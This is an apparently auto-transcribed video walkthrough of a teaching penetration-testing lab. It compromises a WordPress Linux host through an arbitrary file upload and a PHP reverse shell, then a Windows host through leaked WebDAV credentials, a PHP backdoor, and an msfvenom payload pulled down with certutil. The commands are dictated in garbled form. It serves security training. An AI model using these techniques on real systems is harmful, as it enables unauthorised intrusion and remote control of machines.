Web Application Lab Walkthrough

00:01

Welcome to the Web application lab walkthrough.

00:07

So we have two hosts here. One is a bit NAMI Wordpress stack, which is a Lennox host

00:14

and the other is a Windows host.

00:16

And like I told you before you need to go to WP scan dot com and get an api token

00:23

to scan this bit NAMI Wordpress site. Of course you can you can use end map to scan these. But since this is a web attack lab, you can be pretty sure it's either import 80 or 443

00:36

So we go to this site we notice it's in the Wordpress directory. That becomes important when we use WP scan so we can see if the bat it's a Wordpress site.

00:47

So what I'll do is I'll use WP scan.

00:52

You are L HDP

00:55

On 92168

00:58

1-50 Wordpress. Make sure you specify that directory,

01:03

otherwise it's not gonna work.

01:06

Then you can do

01:07

api token equals

01:11

and put your api token

01:14

and start your skin.

01:15

Now you're gonna get a lot of information back and sometimes it's not that you have too little information

01:21

is that you have too much information that comes back.

01:25

You'll see the themes come back with a lot of information.

01:29

So you'll see that config backup is identified here. If you actually go to this site,

01:34

you might not see anything but you paid source. Here's a whole bunch of good information that you can see about the configuration of this. Wordpress site.

01:45

But is that going to get us a shell? Probably not.

01:48

So let me start looking at the vulnerabilities were identified and I actually made this box so hopefully you like it and sometimes it's not. Again, it's not too little information is too much information so you have to kind of pick

02:02

out of these three vulnerabilities, unauthenticated file inclusion

02:07

and authenticates sequel, injection

02:08

and this upload arbitrary code execution or arbitrary file upload Which one is most important. And this is where your hackers senses have to kick in.

02:17

So out of all these vulnerabilities, what was most interesting to me is an arbitrary file. Upload

02:23

the sequel injection. If you look at the pOC,

02:29

it will give you a sequel map

02:31

pOC here.

02:32

I kind of threw that in. There is a trick. I mean you can use this if you want but of course in Os CPU can't use this. And the other thing is I said the people that write this might not give you a lot of information. This will drop you in a sequel shell. So it will just be sitting there staring at you and if you don't know how to write sequel statements, you won't know what to do.

02:52

So understand what all this means. This is a lot of information to give you,

02:57

uh, in this exploitation example.

03:00

So if you want to use this, go ahead and research it.

03:02

Also. This unauthenticated file inclusion.

03:08

This is interesting.

03:13

And we can read the etc. Password file.

03:21

Let's go ahead and pace that.

03:25

So we can read the etc password file. We could read a bunch of files.

03:30

But again, my goal is to get a shell on this box.

03:34

So if I go back and look,

03:37

I did this on purpose here.

03:38

So if you look at the arbitrary file upload is actually to an exploit. DB1 is a medicine plate module. That's fun.

03:49

And the other,

03:52

the other should be PHP A script in PHP. There's two PHP scripts, there's this one

03:58

and this one. And that's why I go back to being able to read these examples.

04:02

So this is we have to ask yourself, am I going to waste a medicine plate module? If you actually look at the code

04:09

is making a crow request,

04:12

you could do this from the command line and I will show you how easy this is. You don't even need to use the PHP.

04:17

So what I can do here

04:21

is I will open up another shell.

04:28

I'm gonna copy

04:30

user

04:31

share

04:34

web shell.

04:36

PHP

04:38

PHP reverse shell here.

04:42

And I'm going to rename it

04:47

to shell just to make it easy.

04:50

And of course this is the pen test monkey shell. So I have to have to edit some things.

04:58

So I'm going to edit

05:02

the ip

05:05

192,168,150.

05:11

I can leave that port.

05:15

And how do I curl this? Well if I look at the poc

05:19

it tells me curl I in it

05:24

where I need to curl it to

05:28

so I can do curl

05:30

attack big F

05:32

file

05:34

data

05:36

equals.

05:39

Mm

05:40

Shell dot

05:43

PHP

05:46

http

05:48

1921681-50

05:53

wordpress.

05:55

And then I need

05:58

this here.

06:05

Then I hope I spelled everything right.

06:10

Single quote for this.

06:19

I don't think like that.

06:33

Uh my wordpress twice.

06:41

Okay.

06:42

So it tells us where our file should be. Of course what we need to do now is set up a listener

06:47

On Port 1234

06:50

and go to that site that it gave us. Of course. I might just cut off my shell right there.

06:59

And that cat

07:00

and L. E. P 1234

07:04

And let's go here.

07:12

Yes. I cut off the shell.

07:20

The joys of

07:23

moving your shell around.

07:25

Uh huh.

07:29

And now we can see I'm a demon and I know it's kind of smushed but the screen is small and I apologize for the labs

07:36

but we can see that

07:40

I am on this box now. 19216812 50. So I've successfully now got gotten on the Lennox box. So that's the way I would get onto it. You don't need to use a medicine flight module. All you need is WP scan and figure out from all that information. Overload

07:57

what the vital information is. So that's just being able to look at these proof of concepts

08:03

and figuring out from here do I need to do wordpress? You could use wordpress and do this but you just wasted a module and I wouldn't do that when all you need to do is a simple, simple curl request which you can understand by looking at the PHP here. If you don't understand it. You know, just take a look and google all this and figure out

08:22

that's how I that's how I figured it out was googling

08:24

and I and basically came down to a curl request so that's how easy it is

08:31

for that and I made it that way on purpose

08:33

so now that we have a shell

08:37

on the Lennox box, I will close this out. So we've successfully completed one task.

08:45

So now let's move over to the windows box.

08:52

So I like to do robots dot txt

08:56

and see what I can find.

08:58

And I see there's a web Dav directory

09:03

now if I go here, if I'm thinking web dav

09:07

I'm thinking I can maybe use cadaver to get onto this. Now the problem is if I use cadaver to put files

09:13

onto this

09:16

ACP 1921681 100

09:22

web dive. It's gonna ask me for a user name and password. I don't know what that is.

09:28

So if I quit and I clear this I can use Derby, http

09:35

1921681 100.

09:39

Web Daph.

09:41

Now you can specify extensions I can duty txt

09:46

or sp or anything but let's do txt and see what we get

10:01

dot txt. Maybe.

10:11

All right. So we found web dav dot txt.

10:16

This gives us the username and password that we want.

10:22

So now what we can do

10:28

as we can try to get a shell on here.

10:30

Now we can try to figure out the technology is is that doesn't use tick does it use

10:37

PHP? Does it use

10:39

ESP I can use what? Web

10:43

1921-681

10:48

100.

10:52

Of course I like to use Apple Isar but we don't have that in the lab.

10:56

So I see it as PHP and PERL.

11:00

So if I have PHP on here,

11:01

I could probably upload that same web shell from Pandas monkey

11:07

onto this box with cadaver.

11:11

So let's go back and use cadaver

11:13

and now we know our credentials, right, user name

11:18

wamp password, Zampa,

11:22

wamp,

11:24

zam. Pop

11:26

awesome.

11:28

So we see index and web dav dot txt Of course that was the file that gave us the information. What we can do now is put

11:35

shell dot PHP on here.

11:37

Unless that

11:39

and of course we can do now

11:43

is like before when split the terminal vertically

11:46

and

11:48

net cat.

11:52

So now that we have a shell on here, I should be able to go to the shell dot PHP

12:01

and I see that there's an error here.

12:03

So why is this? That's a great question to ask yourself. If you read the code. This shell is for

12:11

Lennox, not for Windows.

12:16

So what I could do is put

12:18

user

12:20

share web shells PHP

12:24

simple backdoor.

12:26

So this is an interesting one.

12:41

Simple

12:43

back door that PHP

12:52

So we'll say usage now if I can etc. Password. Is that going to work? No. Why? Because this is a Windows box.

13:01

So a agnostic command that works on both is who am I? And I can see that I am anti authority system.

13:07

Is this enough for a web show?

13:09

Mm hmm. We can do better. Right.

13:15

So what I can do

13:18

is I can do an MSF venom payload.

13:22

I'll do Windows shell,

13:26

reverse

13:28

TCP

13:30

make R L host us.

13:35

El port

13:37

444

13:39

format is E x E

13:43

shell dot e X E.

14:05

Okay,

14:07

so what I can do now

14:11

is we can we can pearl this

14:15

quit

14:16

python three

14:20

http

14:22

server.

14:30

Mm

14:31

Okay, so it's very important. 8000. So what am I trying to do here? I'm trying to get this

14:37

E X C file

14:39

and execute it so that I can get a shell

14:43

on this box.

14:46

Somebody use cert util

14:50

sirte

14:52

you too.

14:56

You are

14:58

your l cash

15:01

Split. I'm doing this from my off my top of my head. So hopefully this is right. 192168

15:07

158,000.

15:13

Shell dot E X C

15:16

output. Shell dot E X C

15:24

like that.

15:26

Mhm.

15:46

All right.

15:46

This is where I google.

15:50

Yeah.

15:58

So you're L cash F

16:11

I don't need output

16:15

and I can see that it got here.

16:23

Great.

16:26

So let's run directory and see if it's there.

16:30

We see it's there.

16:32

So now we need to set up MSF console.

16:41

Actually I don't need to set up MSF console because

16:45

well you can if you want. Right,

16:48

But my shell

16:51

is shell reverse TCP.

16:53

So I could use Net Cat or I could use

16:56

matter split.

17:03

So now if I go

17:07

and shelled

17:11

E x C,

17:14

what I should see now is I am on web Dav here. I am

17:18

to see um system so that's great

17:23

And I see we are on 192168 100.

17:29

I can collapse this terminal here.

17:30

Sub terminal,

17:34

so there you go. So now I'm on the Windows box. So that's how you get a shell

17:40

on both boxes

17:44

and that's just basically from website enumeration

17:48

and knowing what tools you have. I don't think I mentioned cadaver at all in that web exploitation section.